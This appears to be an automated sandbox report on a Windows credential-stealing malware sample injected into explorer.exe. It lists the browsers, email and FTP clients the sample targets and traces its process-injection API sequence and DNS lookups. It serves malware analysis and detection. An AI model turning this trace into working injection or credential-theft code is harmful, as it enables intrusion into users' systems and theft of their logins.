VirtualProtect 894->935 896 321e04 896->902 936 322815 VirtualAlloc 896->936 898 321e10 899 321e1a RtlMoveMemory 898->899 901 321e2d 898->901 899->901 937 321e93 VirtualProtect 901->937 902->812 904 322608 VirtualQuery 903->904 905 32284b 904->905 906 321414 905->906 907 32284f GetProcessHeap HeapFree 905->907 906->811 907->906 909 3214c0 908->909 910 3214a1 908->910 912 321510 909->912 913 3214c8 909->913 938 3217c7 910->938 957 3226e6 lstrlen lstrlen 912->957 916 3217c7 5 API calls 913->916 931 3214b6 913->931 918 3214e0 916->918 917 32155f 919 3226e6 2 API calls 917->919 918->931 945 321647 918->945 920 32156c 919->920 924 3215a0 920->924 925 321584 920->925 920->931 921 321532 959 321752 GetModuleHandleA GetProcAddress 921->959 929 322404 5 API calls 924->929 924->931 962 322404 lstrlen 925->962 932 3215ac 929->932 930 321647 11 API calls 930->931 931->821 932->931 933 321647 11 API calls 932->933 934 3214fb 933->934 934->931 968 3215e0 934->968 935->896 936->898 937->902 939 3217d1 938->939 940 321812 938->940 939->940 941 3226e6 2 API calls 939->941 940->931 942 3217f1 941->942 942->940 973 322861 GetProcessHeap RtlAllocateHeap 942->973 944 321804 RtlMoveMemory 944->940 946 321660 945->946 949 321745 945->949 947 321671 lstrlen 946->947 946->949 948 321683 lstrlen 947->948 947->949 948->949 950 321690 getpeername 948->950 949->934 950->949 951 3216ae inet_ntoa htons 950->951 951->949 953 3216cc 951->953 953->949 974 322861 GetProcessHeap RtlAllocateHeap 953->974 954 321717 wsprintfA 955 32173a 954->955 955->949 956 322843 3 API calls 955->956 956->949 958 32151d 957->958 958->917 958->921 960 321539 959->960 961 321776 RtlZeroMemory RtlZeroMemory RtlZeroMemory RtlZeroMemory 959->961 960->930 960->931 961->960 963 322456 962->963 964 32241c CryptStringToBinaryA 962->964 963->931 964->963 965 322438 964->965 975 322861 GetProcessHeap RtlAllocateHeap 965->975 967 322444 CryptStringToBinaryA 967->963 969 322843 3 API calls 968->969 970 3215f5 969->970 971 322843 3 API calls 970->971 972 3215fc 971->972 972->931 973->944 974->954 975->967 985 321eb6 986 321ed9 985->986 987 321ecc lstrlen 985->987 996 322861 GetProcessHeap RtlAllocateHeap 986->996 987->986 989 321ee1 lstrcat 990 321f16 lstrcat 989->990 991 321f1d 989->991 990->991 997 321f4a 991->997 994 322843 3 API calls 995 321f40 994->995 996->989 1031 3222b8 997->1031 1001 321f77 1036 3227e2 lstrlen MultiByteToWideChar 1001->1036 1003 321f86 1037 322374 RtlZeroMemory 1003->1037 1006 32229a 1008 322843 3 API calls 1006->1008 1007 321fd8 RtlZeroMemory 1009 32200d 1007->1009 1010 321f2d 1008->1010 1009->1006 1014 32203b 1009->1014 1039 3222e5 1009->1039 1010->994 1012 322280 1012->1006 1013 322843 3 API calls 1012->1013 1013->1006 1014->1012 1048 322861 GetProcessHeap RtlAllocateHeap 1014->1048 1016 32210b wsprintfW 1017 322131 1016->1017 1021 32219e 1017->1021 1049 322861 GetProcessHeap RtlAllocateHeap 1017->1049 1019 32216b wsprintfW 1019->1021 1020 32225d 1022 322843 3 API calls 1020->1022 1021->1020 1050 322861 GetProcessHeap RtlAllocateHeap 1021->1050 1023 322271 1022->1023 1023->1012 1025 322843 3 API calls 1023->1025 1025->1012 1026 322256 1029 322843 3 API calls 1026->1029 1027 3221e9 1027->1026 1051 322815 VirtualAlloc 1027->1051 1029->1020 1030 322243 RtlMoveMemory 1030->1026 1032 3222c2 1031->1032 1033 321f69 1031->1033 1034 3226e6 2 API calls 1032->1034 1035 322861 GetProcessHeap RtlAllocateHeap 1033->1035 1034->1033 1035->1001 1036->1003 1038 321f96 1037->1038 1038->1006 1038->1007 1040 3222f2 1039->1040 1042 322353 1039->1042 1041 3222f6 DnsQuery_W 1040->1041 1040->1042 1043 322335 DnsFree inet_ntoa 1040->1043 1041->1040 1042->1014 1043->1040 1044 322355 1043->1044 1052 322861 GetProcessHeap RtlAllocateHeap 1044->1052 1046 32235f 1053 3227e2 lstrlen MultiByteToWideChar 1046->1053 1048->1016 1049->1019 1050->1027 1051->1030 1052->1046 1053->1042 1054 322806 VirtualFree 1055 321425 1056 321432 1055->1056 1057 32144b 1055->1057 1058 322608 VirtualQuery 1056->1058 1059 32143a 1058->1059 1059->1057 1060 321493 23 API calls 1059->1060 1060->1057 976 327728 977 327904 976->977 978 32774b 976->978 977->977 979 32785a LoadLibraryA 978->979 983 32789f VirtualProtect VirtualProtect 978->983 980 327871 979->980 980->978 982 327883 GetProcAddress 980->982 982->980 984 327899 982->984 983->977 1067 32245e lstrlen 1068 322476 CryptBinaryToStringA 1067->1068 1069 3224a5 1067->1069 1068->1069 1070 322489 1068->1070 1073 322861 GetProcessHeap RtlAllocateHeap 1070->1073 1072 322494 CryptBinaryToStringA 1072->1069 1073->1072

                                                                                                                                                                                                                              Callgraph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              • Opacity -> Relevance
                                                                                                                                                                                                                              • Disassembly available
                                                                                                                                                                                                                              callgraph 0 Function_00321332 6 Function_0032263E 0->6 8 Function_00321DE3 0->8 10 Function_00322861 0->10 21 Function_00321493 0->21 26 Function_003224D5 0->26 32 Function_00322843 0->32 43 Function_00322608 0->43 1 Function_00322573 2 Function_00322731 3 Function_00321EB6 3->10 3->32 42 Function_00321F4A 3->42 4 Function_00322374 5 Function_003222B8 11 Function_003226E6 5->11 7 Function_003227E2 22 Function_00321E93 8->22 27 Function_00322815 8->27 31 Function_00321E5D 8->31 34 Function_00321DC0 8->34 9 Function_003215E0 9->32 12 Function_003210A4 12->1 12->2 12->10 18 Function_003225AD 12->18 19 Function_00322592 12->19 28 Function_00321819 12->28 12->43 13 Function_00321425 13->21 13->43 14 Function_003222E5 14->7 14->10 15 Function_00327728 16 Function_00321469 16->21 16->43 17 Function_003224AE 20 Function_00321752 21->9 21->11 21->20 39 Function_00321647 21->39 40 Function_003217C7 21->40 41 Function_00322404 21->41 23 Function_00321016 23->0 23->1 23->2 23->10 23->12 23->18 23->19 23->28 23->43 24 Function_00321B17 25 Function_00323417 28->24 33 Function_00321A80 28->33 28->43 29 Function_00321C19 30 Function_0032245E 30->10 35 Function_00321D80 31->35 32->43 34->29 35->29 36 Function_00321000 36->23 37 Function_00322841 38 Function_00322806 39->10 39->17 39->32 40->10 40->11 41->10 42->2 42->4 42->5 42->7 42->10 42->14 42->27 42->32

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 0 321016-321020 call 322608 3 321022-32104b call 322861 RtlMoveMemory 0->3 4 321097-321098 0->4 7 321071-321090 NtUnmapViewOfSection GetCurrentProcessId 3->7 8 32104d-32106b call 322861 RtlMoveMemory 3->8 9 321092-321093 7->9 10 32109e-3210d7 call 3210a4 call 322861 7->10 8->7 9->4 12 321095-321099 call 321332 9->12 21 3210dc-3210ea CreateToolhelp32Snapshot 10->21 12->10 22 321322-32132d Sleep 21->22 23 3210f0-321106 Process32First 21->23 22->21 24 32131b-32131c CloseHandle 23->24 25 32110c-32111e lstrcmpiA 23->25 24->22 26 321280-321289 call 3225ad 25->26 27 321124-321132 lstrcmpiA 25->27 33 321305-321313 Process32Next 26->33 34 32128b-321294 call 322592 26->34 27->26 29 321138-321146 lstrcmpiA 27->29 29->26 31 32114c-32115a lstrcmpiA 29->31 31->26 32 321160-32116a lstrcmpiA 31->32 32->26 35 321170-32117e lstrcmpiA 32->35 33->25 36 321319 33->36 34->33 41 321296-32129d call 322573 34->41 35->26 38 321184-321192 lstrcmpiA 35->38 36->24 38->26 40 321198-3211a6 lstrcmpiA 38->40 40->26 42 3211ac-3211ba lstrcmpiA 40->42 41->33 47 32129f-3212ac call 322608 41->47 42->26 44 3211c0-3211ce lstrcmpiA 42->44 44->26 46 3211d4-3211e2 lstrcmpiA 44->46 46->26 48 3211e8-3211f6 lstrcmpiA 46->48 47->33 53 3212ae-321300 lstrcmpiA call 322731 call 321819 call 322731 47->53 48->26 50 3211fc-32120a lstrcmpiA 48->50 50->26 52 32120c-32121a lstrcmpiA 50->52 52->26 54 32121c-32122a lstrcmpiA 52->54 53->33 54->26 56 32122c-32123a lstrcmpiA 54->56 56->26 58 32123c-32124a lstrcmpiA 56->58 58->26 61 32124c-32125a lstrcmpiA 58->61 61->26 63 32125c-32126a lstrcmpiA 61->63 63->26 64 32126c-32127a lstrcmpiA 63->64 64->26 64->33
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00322608: VirtualQuery.KERNEL32(00324434,?,0000001C), ref: 00322615
                                                                                                                                                                                                                                • Part of subcall function 00322861: GetProcessHeap.KERNEL32(00000008,0000A000,003210CC), ref: 00322864
                                                                                                                                                                                                                                • Part of subcall function 00322861: RtlAllocateHeap.NTDLL(00000000), ref: 0032286B
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,00000363), ref: 00321038
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,?,?), ref: 0032106B
                                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,?), ref: 00321074
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(?,00321010), ref: 0032107A
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003210DF
                                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 003210FE
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0032111A
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0032112E
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00321142
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00321156
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00321166
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0032117A
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0032118E
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 003211A2
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 003211B6
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 003211CA
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 003211DE
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 003211F2
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00321206
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00321216
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00321226
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00321236
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00321246
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00321256
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00321266
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00321276
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 003212B4
                                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 0032130B
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 0032131C
                                                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 00321327
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_321000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcmpi$HeapMemoryMoveProcessProcess32$AllocateCloseCreateCurrentFirstHandleNextQuerySectionSleepSnapshotToolhelp32UnmapViewVirtual
                                                                                                                                                                                                                              • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                                                                                                                              • API String ID: 2555639992-1680033604
                                                                                                                                                                                                                              • Opcode ID: 6aa480c76c3f41e044277e7d2f2a67305dddff8fec7de464401e1f7e5f80d295
                                                                                                                                                                                                                              • Instruction ID: f8b2825b9e4d9079284aaa9e9dc33e45913f86b7aebc9501016c09d57b0fa8e2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6aa480c76c3f41e044277e7d2f2a67305dddff8fec7de464401e1f7e5f80d295
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1671A531604325EBCB13EBB1BD45E6B7BACAF55780F05092DFA41C3090EB74EA068A75

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00322861: GetProcessHeap.KERNEL32(00000008,0000A000,003210CC), ref: 00322864
                                                                                                                                                                                                                                • Part of subcall function 00322861: RtlAllocateHeap.NTDLL(00000000), ref: 0032286B
                                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 003210DF
                                                                                                                                                                                                                              • Process32First.KERNEL32(00000000,?), ref: 003210FE
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,firefox.exe), ref: 0032111A
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,iexplore.exe), ref: 0032112E
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,chrome.exe), ref: 00321142
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,opera.exe), ref: 00321156
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 00321166
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,outlook.exe), ref: 0032117A
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,thebat.exe), ref: 0032118E
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,thebat32.exe), ref: 003211A2
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,thebat64.exe), ref: 003211B6
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,thunderbird.exe), ref: 003211CA
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,filezilla.exe), ref: 003211DE
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,smartftp.exe), ref: 003211F2
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,winscp.exe), ref: 00321206
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,flashfxp.exe), ref: 00321216
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,cuteftppro.exe), ref: 00321226
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,mailmaster.exe), ref: 00321236
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,263em.exe), ref: 00321246
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,foxmail.exe), ref: 00321256
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,alimail.exe), ref: 00321266
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,mailchat.exe), ref: 00321276
                                                                                                                                                                                                                              • lstrcmpiA.KERNEL32(?,microsoftedgecp.exe), ref: 003212B4
                                                                                                                                                                                                                              • Process32Next.KERNEL32(00000000,00000128), ref: 0032130B
                                                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 0032131C
                                                                                                                                                                                                                              • Sleep.KERNELBASE(000003E8), ref: 00321327
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_321000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: lstrcmpi$HeapProcess32$AllocateCloseCreateFirstHandleNextProcessSleepSnapshotToolhelp32
                                                                                                                                                                                                                              • String ID: 263em.exe$alimail.exe$chrome.exe$cuteftppro.exe$filezilla.exe$firefox.exe$flashfxp.exe$foxmail.exe$iexplore.exe$mailchat.exe$mailmaster.exe$microsoftedgecp.exe$opera.exe$outlook.exe$smartftp.exe$thebat.exe$thebat32.exe$thebat64.exe$thunderbird.exe$winscp.exe
                                                                                                                                                                                                                              • API String ID: 3950187957-1680033604
                                                                                                                                                                                                                              • Opcode ID: b5fb97f3e4c0381476b9fc39090eb8f832ac8996f8ccc0d99b13ba6267ee4013
                                                                                                                                                                                                                              • Instruction ID: 72192e5513cb6d4561290a556a3e6aa0539b2a83583c55911d13ee827e0ecebc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b5fb97f3e4c0381476b9fc39090eb8f832ac8996f8ccc0d99b13ba6267ee4013
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9351A731604329E6CB12DBB1BD45E6F7BEC6F55780F45092DFA80C3080EB78EA058A75

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 112 327728-327745 113 32774b-327758 112->113 114 32790d 112->114 115 32776a-32776f 113->115 114->114 116 327771 115->116 117 327773 116->117 118 327760-327765 116->118 120 327778-32777a 117->120 119 327766-327768 118->119 119->115 119->116 121 327783-327787 120->121 122 32777c-327781 120->122 121->120 123 327789 121->123 122->121 124 327794-327799 123->124 125 32778b-327792 123->125 126 32779b-3277a4 124->126 127 3277a8-3277aa 124->127 125->120 125->124 128 3277a6 126->128 129 32781a-32781d 126->129 130 3277b3-3277b7 127->130 131 3277ac-3277b1 127->131 128->127 132 327822-327825 129->132 133 3277c0-3277c2 130->133 134 3277b9-3277be 130->134 131->130 137 327827-327829 132->137 135 3277e4-3277f3 133->135 136 3277c4 133->136 134->133 140 327804-327811 135->140 141 3277f5-3277fc 135->141 139 3277c5-3277c7 136->139 137->132 138 32782b-32782e 137->138 138->132 142 327830-32784c 138->142 143 3277d0-3277d4 139->143 144 3277c9-3277ce 139->144 140->140 146 327813-327815 140->146 141->141 145 3277fe 141->145 142->137 147 32784e 142->147 143->139 148 3277d6 143->148 144->143 145->119 146->119 149 327854-327858 147->149 150 3277e1 148->150 151 3277d8-3277df 148->151 152 32785a-327870 LoadLibraryA 149->152 153 32789f-3278a2 149->153 150->135 151->139 151->150 154 327871-327876 152->154 155 3278a5-3278ac 153->155 154->149 156 327878-32787a 154->156 157 3278d0-327900 VirtualProtect * 2 155->157 158 3278ae-3278b0 155->158 160 327883-327890 GetProcAddress 156->160 161 32787c-327882 156->161 159 327904-327908 157->159 162 3278b2-3278c1 158->162 163 3278c3-3278ce 158->163 159->159 164 32790a 159->164 165 327892-327897 160->165 166 327899-32789c 160->166 161->160 162->155 163->162 164->114 165->154
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000016.00000002.3006690473.0000000000326000.00000040.80000000.00040000.00000000.sdmp, Offset: 00326000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_326000_explorer.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 95e819ac051166f20f8297e5d30c42042f53986116ff2d4cf99ffa3f3050bfa1
                                                                                                                                                                                                                              • Instruction ID: 0a522b1def0c57fb02e39e0dd1859aabcba9e42350ac6018a4f2e0e2e1bdf9e2
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 95e819ac051166f20f8297e5d30c42042f53986116ff2d4cf99ffa3f3050bfa1
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6351187195C3B24FD7238A78EC846B17BA4FB52320B2A0679C5E5CB3C6E7945C06C7A1

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              • Executed
                                                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                                                              control_flow_graph 167 322861-322871 GetProcessHeap RtlAllocateHeap
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,0000A000,003210CC), ref: 00322864
                                                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000000), ref: 0032286B
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_321000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Heap$AllocateProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 1357844191-0
                                                                                                                                                                                                                              • Opcode ID: 37a4742909cae72459a859f27ae54f4d0bd2922c8d1160e97c6e96d4c25ff159
                                                                                                                                                                                                                              • Instruction ID: 215fb98f33d9ba994f2bfa4771c378c40047539e3e4650aa93db947d3a92d673
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 37a4742909cae72459a859f27ae54f4d0bd2922c8d1160e97c6e96d4c25ff159
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 80A002715501407FDD5657A4AD0DF553A1DA745705F008548724BC50609978554D8775

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00322608: VirtualQuery.KERNEL32(00324434,?,0000001C), ref: 00322615
                                                                                                                                                                                                                              • OpenProcess.KERNEL32(001FFFFF,00000000,?,00000000,74DEE800,microsoftedgecp.exe,?), ref: 0032184E
                                                                                                                                                                                                                              • NtSetInformationProcess.NTDLL(00000000,00000034,?), ref: 00321889
                                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00321919
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(00000000,00323428,00000016), ref: 00321940
                                                                                                                                                                                                                              • RtlMoveMemory.NTDLL(-00000016,00000363), ref: 00321968
                                                                                                                                                                                                                              • NtUnmapViewOfSection.NTDLL(000000FF,-00000016), ref: 00321978
                                                                                                                                                                                                                              • CreateMutexA.KERNEL32(00000000,00000000,opera_shared_counter,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00321992
                                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?,00000000), ref: 0032199A
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 003219A8
                                                                                                                                                                                                                              • Sleep.KERNEL32(000003E8,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 003219AF
                                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(ntdll,atan,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001), ref: 003219C5
                                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 003219CC
                                                                                                                                                                                                                              • ReadProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 003219E2
                                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00321A0C
                                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00321A1F
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00321A26
                                                                                                                                                                                                                              • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00321A2D
                                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,?,00000005,00000363), ref: 00321A41
                                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00321A58
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00321A65
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00321A6B
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,?), ref: 00321A71
                                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00321A74
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_321000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Handle$Close$MemoryProcess$Create$MoveRemoteSectionSleepThreadUnmapViewWrite$AddressErrorInformationLastModuleMutexOpenProcQueryReadVirtual
                                                                                                                                                                                                                              • String ID: atan$microsoftedgecp.exe$ntdll$opera_shared_counter
                                                                                                                                                                                                                              • API String ID: 1066286714-4141090125
                                                                                                                                                                                                                              • Opcode ID: 1cae8a815ff229c0a92f7b65d34545911217e790a62a22962ca112030f46eae8
                                                                                                                                                                                                                              • Instruction ID: 7f452f9592007bb3c144194148aba7a1eb0ba6dab2808c263083eaf0079848e1
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1cae8a815ff229c0a92f7b65d34545911217e790a62a22962ca112030f46eae8
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9C619B31205314AFD322DF25AD84E6BBBECEB98750F01461CF94A92251DB74DE058BA2

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000), ref: 0032265A
                                                                                                                                                                                                                              • CryptCreateHash.ADVAPI32(?,00008003,00000000,00000000,?), ref: 00322672
                                                                                                                                                                                                                              • lstrlen.KERNEL32(?,00000000), ref: 0032267A
                                                                                                                                                                                                                              • CryptHashData.ADVAPI32(?,?,00000000,?,00000000), ref: 00322685
                                                                                                                                                                                                                              • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,00000000,?,00000000), ref: 0032269F
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 003226B6
                                                                                                                                                                                                                              • CryptDestroyHash.ADVAPI32(?), ref: 003226CF
                                                                                                                                                                                                                              • CryptReleaseContext.ADVAPI32(?,00000000), ref: 003226D9
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000016.00000002.3006690473.0000000000321000.00000040.80000000.00040000.00000000.sdmp, Offset: 00321000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_321000_explorer.jbxd
                                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Crypt$Hash$Context$AcquireCreateDataDestroyParamReleaselstrlenwsprintf
                                                                                                                                                                                                                              • String ID: %02X
                                                                                                                                                                                                                              • API String ID: 3341110664-436463671
                                                                                                                                                                                                                              • Opcode ID: 1cd98bd2ff3e0d43db62e48c3d7521997f95c043c12acc3c8864579a463b0a41
                                                                                                                                                                                                                              • Instruction ID: b9ac4f05ca78a35ff4d309c1d42f9ac82b573a79160b68a2ece707189410d9b8
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1cd98bd2ff3e0d43db62e48c3d7521997f95c043c12acc3c8864579a463b0a41
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D611FB72A00108BFDB229B95EC88EEEBFBCEB44741F108069F606E2150D6755F569B74

                                                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                                • Part of subcall function 00322861: GetProcessHeap.KERNEL32(00000008,0000A000,003210CC), ref: 00322864
                                                                                                                                                                                                                                • Part of subcall function 00322861: RtlAllocateHeap.NTDLL(00000000), ref: 0032286B
                                                                                                                                                                                                                              • GetModuleFileNameA.KERNEL32(00000000,00000000,00000104,?,?,0032109E,?,00321010), ref: 0032134A
                                                                                                                                                                                                                              • GetCurrentProcessId.KERNEL32(00000003,?,0032109E,?,00321010), ref: 0032135B
                                                                                                                                                                                                                              • wsprintfA.USER32 ref: 00321372
